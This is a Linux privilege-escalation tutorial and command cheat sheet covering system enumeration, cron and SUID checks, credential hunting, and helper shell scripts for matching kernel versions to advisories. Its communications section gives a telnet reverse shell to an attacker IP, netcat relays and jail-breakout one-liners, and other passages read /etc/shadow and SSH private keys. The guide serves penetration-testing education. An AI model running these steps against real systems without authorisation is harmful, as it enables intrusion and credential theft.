Basic Linux Privilege Escalation

The document provides guidance on basic Linux privilege escalation techniques. It discusses enumerating operating system details such as the distribution, kernel version, installed applications and their configurations. It also covers investigating users, groups, passwords, services, scheduled jobs, networking and file permissions to find ways to escalate privileges on Linux systems. The key is thorough enumeration, processing the findings, adapting exploits, and trial and error.

Before starting, I would like to point out - I'm no expert. As far as I know, there isn't a "magic" answer in this huge area. This is simply my findings, typed up, to be shared (my starting point). Below is a mixture of commands to do the same thing, to look at things in a different place or just in a different light. I know there are more "things" to look for. It's just a basic & rough guide. Not every command will work for each system, as Linux varies so much. "It" will not jump off the screen - you have to hunt for that "little thing", as "the devil is in the detail".
Enumeration is the key.
(Linux) privilege escalation is all about:
 Collect - Enumeration, more enumeration and some more enumeration.
 Process - Sort through the data, analyse and prioritise.
 Search - Know what to search for and where to find the exploit code.
 Adapt - Customise the exploit so it fits. Not every exploit works for every system "out of the box".
 Try - Get ready for (lots of) trial and error.
Operating System
What's the distribution type? What version?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release # Debian based
cat /etc/redhat-release # Redhat based
What's the kernel version? Is it 64-bit?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
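The commands above print the facts; what you then do with them is compare. Below is an added example (not part of the original guide) in POSIX shell: it reads a named field out of an os-release style file and compares the numeric part of a kernel version string against a threshold, which is the check you repeat for every candidate kernel exploit before bothering to adapt it. The os-release sample used in the comments and the version numbers are assumptions for illustration, not tied to any particular bug.

```sh
#!/bin/sh
# Added example: parse the distribution and kernel facts into something you can
# compare, instead of eyeballing the raw output. Not part of the original guide.

# os_release_field FILE KEY -> value of KEY=... in an os-release style file, with
# surrounding double or single quotes removed. FILE is normally /etc/os-release.
os_release_field() {
  v=$(sed -n "s/^$2=//p" "$1" | head -n 1)
  v=${v#\"}; v=${v%\"}; v=${v#\'}; v=${v%\'}
  printf '%s\n' "$v"
}

# kver_cmp A B -> prints -1, 0 or 1 comparing the numeric major.minor.patch prefix
# of two kernel version strings. Distro suffixes such as "-21-generic" or "-1019-aws"
# are ignored, so "4.4.0-21-generic" compares equal to "4.4".
kver_cmp() {
  a="${1%%[!0-9.]*}."   # strip from the first non-digit/dot; trailing dot keeps cut -s happy
  b="${2%%[!0-9.]*}."
  i=1
  while [ "$i" -le 3 ]; do
    x=$(printf '%s' "$a" | cut -s -d. -f"$i"); y=$(printf '%s' "$b" | cut -s -d. -f"$i")
    x=${x:-0}; y=${y:-0}
    if [ "$x" -lt "$y" ]; then echo -1; return; fi
    if [ "$x" -gt "$y" ]; then echo 1; return; fi
    i=$((i + 1))
  done
  echo 0
}

# kver_in_range VER LOW HIGH -> success if LOW <= VER < HIGH. This is the shape of
# most kernel advisories ("introduced in LOW, fixed in HIGH"), so use it to decide
# whether an exploit is even worth downloading before you start adapting it.
kver_in_range() {
  [ "$(kver_cmp "$1" "$2")" -ge 0 ] && [ "$(kver_cmp "$1" "$3")" -lt 0 ]
}

# Live summary of the box this runs on (skipped quietly if os-release is missing).
if [ -r /etc/os-release ]; then
  printf 'distro=%s version=%s kernel=%s arch=%s\n' \
    "$(os_release_field /etc/os-release ID)" \
    "$(os_release_field /etc/os-release VERSION_ID)" \
    "$(uname -r)" "$(uname -m)"
fi
```

Only the numeric prefix is compared; a distribution kernel such as 3.13.0-24-generic may already carry a backported fix, so treat a match as "worth checking the changelog", not as proof.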
What can be learnt from the environmental variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
Is there a printer?
lpstat -a
Applications & Services
What services are running? Which service has which user privilege?
ps aux
ps -ef
top
cat /etc/services
Which service(s) are being run by root? Of these services, which are vulnerable? It's worth a double check!
ps aux | grep root
ps -ef | grep root
What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archives
ls -alh /var/cache/yum/
Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' # anything readable
What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
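Listing the cron files is only half the check; the question that matters is whether you can change what a root job runs. The following is an added example, not part of the original guide, in POSIX shell: it pulls every absolute path out of a crontab's command fields and reports the ones that are world-writable, or that live in a world-writable directory without the sticky bit (where the file can simply be replaced even if it cannot be edited). The file and directory names in it are assumptions; point it at /etc/crontab, the files under /etc/cron.d and the per-user crontabs listed above.

```sh
#!/bin/sh
# Added example: find cron targets the current user could swap for their own code.
# Not from the original guide.

# mode_of PATH -> the 10-character mode column of `ls -ld`, e.g. "-rwxrwxrwx".
# -L follows symlinks so /bin/sh -> dash reports the target's mode, not lrwxrwxrwx.
mode_of() { ls -ldL -- "$1" 2>/dev/null | cut -c1-10; }

# world_writable PATH -> success if the "other" write bit (9th character) is set
world_writable() { case "$(mode_of "$1")" in ????????w?) return 0 ;; *) return 1 ;; esac; }

# sticky PATH -> success if the sticky bit (10th character, t or T) is set
sticky() { case "$(mode_of "$1")" in ?????????[tT]) return 0 ;; *) return 1 ;; esac; }

# cron_paths CRONTAB -> every absolute path used in a job's command field, one per
# line. Skips comments, blank lines and VAR=value lines; works for @reboot entries
# and for both the system format (user column) and the user format (no user column),
# because a schedule field never starts with "/" but a command or its arguments do.
cron_paths() {
  awk '
    /^[[:space:]]*(#|$)/ { next }                 # comment or blank line
    $1 ~ /^[A-Za-z_][A-Za-z0-9_]*=/ { next }      # SHELL=, PATH=, MAILTO=...
    {
      for (i = 1; i <= NF; i++) {
        t = $i; sub(/[;&|>]+$/, "", t)            # strip trailing shell punctuation
        if (t ~ /^\//) print t
      }
    }' "$1"
}

# cron_writable_targets CRONTAB -> "FILE <path>" for world-writable regular files and
# "DIR <path>" for files whose parent directory is world-writable and not sticky.
cron_writable_targets() {
  cron_paths "$1" | LC_ALL=C sort -u | while read -r p; do
    [ -f "$p" ] || continue                      # skips /dev/null, directories, missing paths
    if world_writable "$p"; then echo "FILE $p"; fi
    d=$(dirname "$p")
    if world_writable "$d" && ! sticky "$d"; then echo "DIR $p"; fi
  done
}
```

The check is deliberately on the "other" bit rather than on `[ -w ]`, so the answer is the same whoever runs it; if you are in the owning group of a 775 script that is a separate (and equally useful) finding.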
Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
Communications & Networking
What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname
What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w
What's cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee
Is packet sniffing possible? What can be seen? Listen to live traffic (needs root or CAP_NET_RAW)
tcpdump '(tcp and dst host 192.168.1.7 and dst port 80) or (tcp and dst host 10.5.5.252 and dst port 21)'
Note: tcpdump '(tcp and dst host [ip] and dst port [port]) or (tcp and dst host [ip] and dst port [port])'
Have you got a shell? Can you interact with the system?
nc -lvp 4444 # Attacker. Input (commands)
nc -lvp 4445 # Attacker. Output (results)
telnet [attacker's ip] 4444 | /bin/sh | telnet [attacker's ip] 4445 # On the target system. Use the attacker's IP!
Note: http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
Is port forwarding possible? Redirect and interact with traffic from another view
Note: http://www.boutell.com/rinetd/
Note: http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch
Note: http://downloadcenter.mcafee.com/products/tools/foundstone/fpipe2_1.zip
Note (Windows): FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
Note: ssh -L [local port]:[remote ip]:[remote port] [user]@[ip] opens a port on your side that is delivered from the SSH server; ssh -R [remote port]:[local ip]:[local port] [user]@[ip] opens a port on the SSH server that is delivered back to your side
ssh -L 8080:127.0.0.1:80 [user]@[ip] # Local port: localhost:8080 here reaches port 80 on the SSH server
ssh -R 8080:127.0.0.1:80 [user]@[ip] # Remote port: port 8080 on the SSH server reaches port 80 here
Note: mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] > backpipe
Note: mkfifo backpipe creates the same named pipe. OpenBSD netcat takes nc -l 8080 (no -p); the traditional netcat syntax is shown here.
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 > backpipe # Port relay
mknod backpipe p ; nc -l -p 8080 < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow > backpipe # Proxy (port 8080 to 80), logging both directions to inflow/outflow
mknod backpipe p ; (nc -l -p 8080 < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow > backpipe) & # Same proxy, backgrounded
Is tunnelling possible? Send commands locally, remotely
ssh -D 127.0.0.1:9050 -N [username]@[ip] # SOCKS proxy on local port 9050, carried over SSH
proxychains ifconfig # run a command through that proxy
Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l
What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
Anything "interesting" in the home directory(s)? If it's possible to access
ls -ahlR /root/
ls -ahlR /home/
Are there any passwords in scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
What has the user been doing? Is there any password in plain text? What have they been editing?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
Can private-key information be found?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
File Systems
Which configuration files can be written in /etc/? Able to reconfigure a service?
ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^.*w.*/' # Anyone (owner, group or other)
ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^..w/' # Owner
ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^.....w/' # Group
ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /w.$/' # Other

find /etc/ -readable -type f 2>/dev/null # Anyone
find /etc/ -maxdepth 1 -readable -type f 2>/dev/null # Anyone, top level only
What can be found in /var/ ?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases
Any settings/files (hidden) on the website? Any settings file with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/
Is there anything in the log file(s)? (Could help with "Local File Includes"!)
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog # binary; the faillog command prints it
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog # binary; the lastlog command prints it
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp # binary; last -f /var/log/wtmp prints it
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp # binary; who prints it
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/

Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages ... wtmp
Note: http://www.thegeekstuff.com/2011/08/linux-var-log-files/
If commands are limited, can you break out of the "jail" shell?
python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import os; os.system("/bin/bash")'
/bin/sh -i
How are file-systems mounted?
mount
df -h
Are there any unmounted file-systems?
cat /etc/fstab
What "Advanced Linux File Permissions" are used? Sticky bits, SUID & SGID
find / -perm -1000 -type d 2>/dev/null # Sticky bit - only the owner of the directory or the owner of a file can delete or rename in it
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - runs as the group, not the user who started it
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - runs as the owner, not the user who started it

find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null # SGID or SUID (the parentheses matter: without them -type f only applies to the SUID half)
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in the *bin directories only (quicker search)

# find starting at root (/), SGID or SUID, not symbolic links, only 3 folders deep, list with more detail and hide errors such as permission denied
find / -maxdepth 3 \( -perm -g=s -o -perm -u=s \) ! -type l -exec ls -ld {} \; 2>/dev/null
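The find commands above tell you which files have a special bit set; reading the mode column to know exactly which bit, and whether it is actually effective, is the next step. Below is an added example, not from the original guide, in POSIX shell. mode_flags converts an ls -l mode string such as -rwsr-xr-x back into its octal value and names the special bits (a capital S or T means the bit is set without the matching execute bit, which is usually a misconfiguration rather than a working setuid binary), and flag_listing filters an ls -l or find -exec ls -ld listing down to the entries with a special bit or world write. It applies the same test as the awk lines in the File Systems section. The listing in the usage note is constructed.

```sh
#!/bin/sh
# Added example: decode `ls -l` mode strings and triage a listing by special bits.
# Not from the original guide.

# mode_flags MODE -> "<4-digit octal>[ suid][ sgid][ sticky][ world-writable]"
# MODE is the 10-character column such as "-rwsr-xr-x"; an 11th ACL marker is ignored.
mode_flags() {
  m=$(printf '%s' "$1" | cut -c2-10)     # drop the file type character
  special=0; perm=""; pos=0; v=0
  while [ -n "$m" ]; do
    ch=${m%"${m#?}"}; m=${m#?}           # first character, then the rest
    t=$((pos / 3))                       # 0 = owner, 1 = group, 2 = other
    case $ch in
      r) v=$((v + 4)) ;;
      w) v=$((v + 2)) ;;
      x) v=$((v + 1)) ;;
      s) v=$((v + 1)); special=$((special + (t == 0 ? 4 : 2))) ;;   # set-id bit with execute
      S) special=$((special + (t == 0 ? 4 : 2))) ;;                  # set-id bit, no execute
      t) v=$((v + 1)); special=$((special + 1)) ;;                  # sticky with execute
      T) special=$((special + 1)) ;;                                # sticky, no execute
    esac
    pos=$((pos + 1))
    if [ $((pos % 3)) -eq 0 ]; then perm="$perm$v"; v=0; fi
  done
  flags=""
  [ $((special & 4)) -ne 0 ] && flags="$flags suid"
  [ $((special & 2)) -ne 0 ] && flags="$flags sgid"
  [ $((special & 1)) -ne 0 ] && flags="$flags sticky"
  case $1 in ????????w?*) flags="$flags world-writable" ;; esac
  printf '%s%s%s\n' "$special" "$perm" "$flags"
}

# flag_listing: reads `ls -l` / `ls -ld` lines on stdin and prints "<octal> <flags> <name>"
# only for entries that carry a special bit or are world-writable. Names containing
# runs of spaces come out with single spaces.
flag_listing() {
  while read -r mode rest; do
    case $mode in
      [-dlcbps][-r][-w][-xsS]*) ;;     # looks like a mode column
      *) continue ;;                   # "total N" header, blank lines
    esac
    out=$(mode_flags "$mode")
    case $out in
      *' '*)                           # at least one flag was reported
        set -- $rest                   # links owner group size month day time name...
        if [ $# -gt 7 ]; then shift 7; fi
        echo "$out $*" ;;
    esac
  done
}
```

Usage: `find / \( -perm -u=s -o -perm -g=s \) -type f -exec ls -ld {} \; 2>/dev/null | flag_listing`, or `ls -l /usr/bin | flag_listing`. On a constructed listing containing `-rwsr-xr-x ... /usr/bin/passwd`, `-rwxrwxrwx ... /opt/backup.sh` and `drwxrwxrwt ... /tmp` it prints `4755 suid /usr/bin/passwd`, `0777 world-writable /opt/backup.sh` and `1777 sticky world-writable /tmp`, and says nothing about a plain 0755 binary.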
Where can be written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null # folders writable by the current user
find / -perm -222 -type d 2>/dev/null # folders writable by owner, group and other
find / -perm -o=w -type d 2>/dev/null # world-writable folders

find / -perm -o=x -type d 2>/dev/null # world-executable (searchable) folders

find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null # world-writable & executable folders
Any "problem" files? World-writable, "nobody" files
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print 2>/dev/null # world-writable folders without the sticky bit
find /dir -xdev \( -nouser -o -nogroup \) -print 2>/dev/null # files with no owner / no group
Preparation & Finding Exploit Code
What development tools/languages are installed/supported?
find / -name 'perl*' 2>/dev/null
find / -name 'python*' 2>/dev/null
find / -name 'gcc*' 2>/dev/null
find / -name cc 2>/dev/null
How can files be uploaded?
find / -name wget 2>/dev/null
find / -name 'nc*' 2>/dev/null
find / -name 'netcat*' 2>/dev/null
find / -name 'tftp*' 2>/dev/null
find / -name ftp 2>/dev/null
Finding exploit code
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com
Finding more information regarding the exploit
http://www.cvedetails.com
http://packetstormsecurity.org/files/cve/[CVE]
http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
http://www.vulnview.com/cve-details.php?cvename=[CVE]
(Quick) "Common" exploits. Warning: pre-compiled binary files. Use at your own risk.
http://web.archive.org/web/20111118031158/http://tarantula.by.ru/localroot/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/
Mitigations
Is any of the above information easy to find?
Try doing it! Set up a cron job which automates script(s) and/or 3rd party products
Is the system fully patched?
Kernel, operating system, all applications, their plugins and web services
apt-get update && apt-get upgrade
yum update
Are services running with the minimum level of privileges required?
For example, do you need to run MySQL as root?
Scripts
Can any of this be automated?!
http://pentestmonkey.net/tools/unix-privesc-check/
http://labs.portcullis.co.uk/application/enum4linux/
http://bastille-linux.sourceforge.net
Other (quick) guides & Links
Enumeration
http://www.0daysecurity.com/penetration-testing/enumeration.html
http://www.microloft.co.uk/hacking/hacking3.htm
Misc
http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf
http://pentest.cryptocity.net/files/operations/2009/post_exploitation_fall09.pdf
http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html